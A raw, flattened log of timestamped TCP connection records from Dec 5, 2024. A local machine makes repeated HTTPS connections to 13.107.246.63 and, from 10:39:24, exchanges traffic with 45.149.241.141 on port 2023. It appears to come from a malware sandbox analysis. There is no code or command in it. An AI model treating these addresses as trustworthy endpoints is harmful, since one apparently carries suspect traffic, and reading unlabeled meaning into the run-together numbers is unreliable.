                                                                                                              Dec 5, 2024 10:39:19.255762100 CET4434990113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:19.255835056 CET49901443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:19.262605906 CET49901443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:19.262624025 CET4434990113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.631972075 CET4434989813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.647097111 CET49898443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:20.647131920 CET4434989813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.647744894 CET49898443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:20.647749901 CET4434989813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.923440933 CET4434989913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.923994064 CET49899443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:20.924024105 CET4434989913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.924721956 CET49899443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:20.924727917 CET4434989913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.927145004 CET4434990013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.927648067 CET49900443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:20.927679062 CET4434990013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.928102970 CET49900443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:20.928114891 CET4434990013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.978660107 CET4434990113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.979089975 CET49901443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:20.979121923 CET4434990113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:20.979619980 CET49901443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:20.979625940 CET4434990113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.066308022 CET4434989813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.069860935 CET4434989813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.069911957 CET49898443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.069931030 CET4434989813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.069987059 CET49898443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.072001934 CET49898443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.072036982 CET4434989813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.072057009 CET49898443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.072066069 CET4434989813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.104814053 CET49902443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.104880095 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.104939938 CET49902443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.108644009 CET49902443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.108656883 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.377156973 CET4434990013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.377156973 CET4434989913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.380435944 CET4434989913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.380484104 CET49899443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.380570889 CET4434990013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.380712032 CET49900443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.395425081 CET49899443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.395445108 CET4434989913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.395458937 CET49899443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.395466089 CET4434989913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.407634020 CET49900443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.407691956 CET4434990013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.407711983 CET49900443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.407721043 CET4434990013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.412995100 CET4434990113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.416182041 CET4434990113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.416229963 CET49901443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.416280985 CET49901443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.416301966 CET4434990113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.416312933 CET49901443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.416318893 CET4434990113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.438175917 CET49903443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.438236952 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.438287020 CET49903443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.438438892 CET49903443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.438457012 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.454123974 CET49904443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.454159021 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.454257011 CET49904443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.468353987 CET49904443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.468367100 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.480464935 CET49905443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.480545044 CET4434990513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.480608940 CET49905443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.480854034 CET49905443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.480874062 CET4434990513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.804559946 CET4434989313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.808028936 CET4434989313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.808224916 CET49893443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.816009045 CET49893443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.816009045 CET49893443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.816030979 CET4434989313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.816047907 CET4434989313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.821651936 CET49906443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.821686983 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:21.821892023 CET49906443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.840327024 CET49906443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:21.840358973 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:22.825086117 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:22.840147972 CET49902443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:22.840186119 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:22.840693951 CET49902443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:22.840699911 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.161263943 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.162062883 CET49903443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.162117004 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.162570953 CET49903443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.162586927 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.184192896 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.184696913 CET49904443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.184724092 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.185194969 CET49904443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.185204983 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.195606947 CET4434990513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.196090937 CET49905443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.196130991 CET4434990513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.196579933 CET49905443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.196585894 CET4434990513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.258466959 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.258508921 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.258723974 CET49902443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.258769989 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.262528896 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.262607098 CET49902443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.264951944 CET49902443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.264951944 CET49902443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.264981031 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.264991999 CET4434990213.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.284776926 CET49907443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.284837008 CET4434990713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.285172939 CET49907443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.306910992 CET49907443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.306930065 CET4434990713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.557944059 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.569210052 CET49906443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.569236040 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.569837093 CET49906443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.569843054 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.596137047 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.599670887 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.599740028 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.599735975 CET49903443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.599816084 CET49903443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.599898100 CET49903443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.599925995 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.599941969 CET49903443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.599947929 CET4434990313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.622589111 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.625327110 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.625374079 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.625392914 CET49904443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.625418901 CET49904443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.625940084 CET49904443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.625940084 CET49904443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.625962019 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.625967026 CET4434990413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.630417109 CET4434990513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.633588076 CET49908443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.633654118 CET4434990513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.633658886 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.633738041 CET49908443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.633783102 CET49905443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.633783102 CET49905443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.633836985 CET49905443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.633861065 CET4434990513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.634236097 CET49908443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.634263039 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.652635098 CET49909443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.652697086 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.652769089 CET49909443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.653762102 CET49910443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.653816938 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.653996944 CET49910443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.654115915 CET49910443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.654124975 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.665518999 CET49909443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.665535927 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.992613077 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.996077061 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.996133089 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.996136904 CET49906443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.996186972 CET49906443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.996315002 CET49906443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.996315002 CET49906443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.996335030 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.996345997 CET4434990613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.999231100 CET49911443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.999298096 CET4434991113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:23.999511003 CET49911443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.999722004 CET49911443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:23.999738932 CET4434991113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:24.037134886 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:24.156989098 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:24.157085896 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:24.157233953 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:24.276984930 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.047189951 CET4434990713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.048003912 CET49907443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.048032045 CET4434990713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.048715115 CET49907443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.048721075 CET4434990713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.371927023 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.372478008 CET49910443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.372503996 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.373054028 CET49910443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.373059988 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.385179043 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.385827065 CET49909443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.385853052 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.386288881 CET49909443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.386295080 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.394526005 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.395658016 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:25.515470982 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.522136927 CET4434990713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.522211075 CET4434990713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.522356033 CET49907443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.532716990 CET49907443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.532744884 CET4434990713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.532759905 CET49907443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.532768011 CET4434990713.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.536971092 CET49913443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.537014008 CET4434991313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.537336111 CET49913443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.537904024 CET49913443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.537923098 CET4434991313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.714824915 CET4434991113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.715413094 CET49911443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.715434074 CET4434991113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.716089010 CET49911443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.716097116 CET4434991113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.796188116 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.805632114 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:25.809953928 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.813061953 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.813111067 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.813123941 CET49910443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.813164949 CET49910443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.814169884 CET49910443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.814184904 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.814207077 CET49910443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.814215899 CET4434991013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.817780018 CET49914443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.817827940 CET4434991413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.817910910 CET49914443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.818414927 CET49914443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.818427086 CET4434991413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.819458961 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.822890997 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.822937012 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.822983980 CET49909443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.823142052 CET49909443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.823158026 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.823173046 CET49909443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.823179007 CET4434990913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.825506926 CET49915443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.825536966 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.825730085 CET49915443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.825855970 CET49915443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:25.825875044 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:25.925318956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.148957968 CET4434991113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.152420998 CET4434991113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.152482033 CET49911443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:26.152585030 CET49911443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:26.152605057 CET4434991113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.152617931 CET49911443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:26.152622938 CET4434991113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.156235933 CET49916443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:26.156276941 CET4434991613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.156361103 CET49916443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:26.157399893 CET49916443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:26.157413960 CET4434991613.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.236993074 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.237065077 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.237077951 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.237116098 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.237149954 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.237199068 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.237211943 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.237225056 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.237235069 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.237281084 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.237438917 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.237487078 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.245444059 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.245528936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.245592117 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.251883984 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.251913071 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.251975060 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.356787920 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.428899050 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.428955078 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.428968906 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.432888031 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.432966948 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.432965994 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.441920042 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.441992044 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.442054033 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.448323011 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.448400021 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.448484898 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.456046104 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.456098080 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.456145048 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.463931084 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.464006901 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.464039087 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.471868038 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.471986055 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.471987009 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.479646921 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.479712963 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.479764938 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.487581015 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.487643003 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.487698078 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.495358944 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.495415926 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.495482922 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.503263950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.503310919 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.503345013 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.548842907 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.548913956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.548969984 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.614999056 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.621179104 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.621202946 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.621313095 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.625104904 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:26.625169992 CET20234991245.149.241.141192.168.2.6
